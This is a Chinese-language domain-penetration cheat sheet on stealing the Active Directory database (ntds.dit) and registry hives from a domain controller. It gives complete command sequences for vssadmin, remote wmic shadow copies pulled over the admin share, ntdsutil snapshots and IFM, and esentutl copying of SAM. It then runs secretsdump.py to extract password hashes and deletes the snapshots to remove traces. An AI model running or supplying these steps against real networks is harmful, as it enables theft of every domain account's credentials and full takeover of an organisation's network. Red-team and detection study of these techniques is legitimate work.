基础-ntds.dit拖取
基础-ntds.dit拖取
参考资料
https://3gstudent.github.io/3gstudent.github.io/域渗透-获得域控服务器的NTDS.dit文件/
基础知识
1. Ntds.dit文件是域环境中域控上会有的一个二进制文件,是主要的活动目录数据库,其文件路径为域控的 %SystemRoot%\ntds\ntds.dit,活动目录始终会访问这个文件,所以文件禁止被读取
2. reg save hklm\system c:\system.hive 导出ntds.dit后,还需要导出SYSTEM,将system.hive转储,因为system.hive中存放着ntds.dit的密钥
在一般情况下,Ntds.dit是默认被Windows系统锁定的,想要读取该文件就要利用卷影拷贝服务(Volume Shadow Copy Service,VSS),得到Ntds.dit文件的副本。卷影拷贝服务(VSS)本质上是属于快照技术的一种,主要用于备份和恢复,即使目标文件被处于锁定状态
其获取Ntds.dit的基本步骤如下:
创建目标主机的卷影拷贝(包含Windows上的全部文件)
然后在创建的卷影拷贝中将ntds.dit复制出来
最后将当前创建的卷影拷贝删除
调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036
python secretsdump.py -system system.hive -ntds ntds.dit local 从NTDS.dit获取密码哈希值
利用vssadmin工具
vssadmin是Windows上的一个卷影拷贝服务的命令行管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息,显示已安装的所有卷影拷贝写入程序和提供程序,以及改变卷影拷贝的存储空间的大小等
vssadmin list shadows 查询当前系统的快照
vssadmin create shadow /for=C: 在已经获取到权限的域控制器上执行如下命令,创建一个C盘的卷影拷贝(获得Shadow Copy Volume Name为\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit 然后在创建的卷影拷贝中将ntds.dit复制到C盘中
vssadmin delete shadows /for=c: /quiet 最后将刚刚创建的卷影拷贝删除
wmic远程shadowcopy
wmic远程shadowcopy
wmic shadowcopy call create "ClientAccessible","C:"
wmic shadowcopy get volumeName
wmic process call create "cmd /c mklink c:\windows\temp\a \\?\Volume{b7bca316-0000-0000-0000-501f00000000}\windows"
copy \\xx.xx\c$\windows\temp\a\windows\ntds\ntds.dit
wmic process call create "cmd /c rd c:\windows\temp\a"
wmic shadowcopy where "id='{78EB0D40-4D09-4F72-A8F9-C9DF49B03BB1}'" delete
wmic /node:192.168.9.136 shadowcopy get volumeName 查询当前系统的快照
wmic /node:192.168.9.136 shadowcopy call create Volume=c:\ 给c盘创建快照
wmic /node:192.168.9.136 shadowcopy get volumeName 查看当前创建的快照 下一步使用
wmic /node:192.168.9.136 process call create "cmd /c mklink /d c:\windows\temp\a \\?\Volume{b4c3d945-35dd-11ea-8892-806e6f6e6963}\windows" 给快照创建符号链接访问快照中的文件
copy \\192.168.9.136\c$\windows\temp\a\windows\ntds\ntds.dit 拷贝ntds.dit到本地
wmic /node:192.168.9.136 process call create "cmd /c rd c:\windows\temp\a"
wmic shadowcopy where "id='{78EB0D40-4D09-4F72-A8F9-C9DF49B03BB1}'" delete
ntdsutil(会产生日志文件)
Volume Shadow Copy Service
支持Windows Server 2003 及以上操作系统
ntdsutil snapshot "List All" quit quit 查询当前系统的快照
ntdsutil snapshot "List Mounted" quit quit
ntdsutil snapshot "activate instance ntds" create quit quit 创建快照 guid为{6e31c0ab-c517-420b-845d-c38acbf77ab9}
ntdsutil snapshot "mount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit 挂载快照(快照挂载为C:\$SNAP_201802270645_VOLUMEC$\)
copy C:\$SNAP_201802270645_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit 复制ntds.dit
ntdsutil snapshot "unmount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit 卸载快照:
ntdsutil snapshot "delete {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit 删除快照
###############################################################################
ntdsutil "activate instance ntds" ifm "create full C:\windows\temp\ntdsutil" quit quit 一行生成快照 自动拷贝到C:\windows\temp\ntdsutil 并且自动卸载
未测试
esentutl.exe /y /vss c:\windows\system32\config\sam /d sam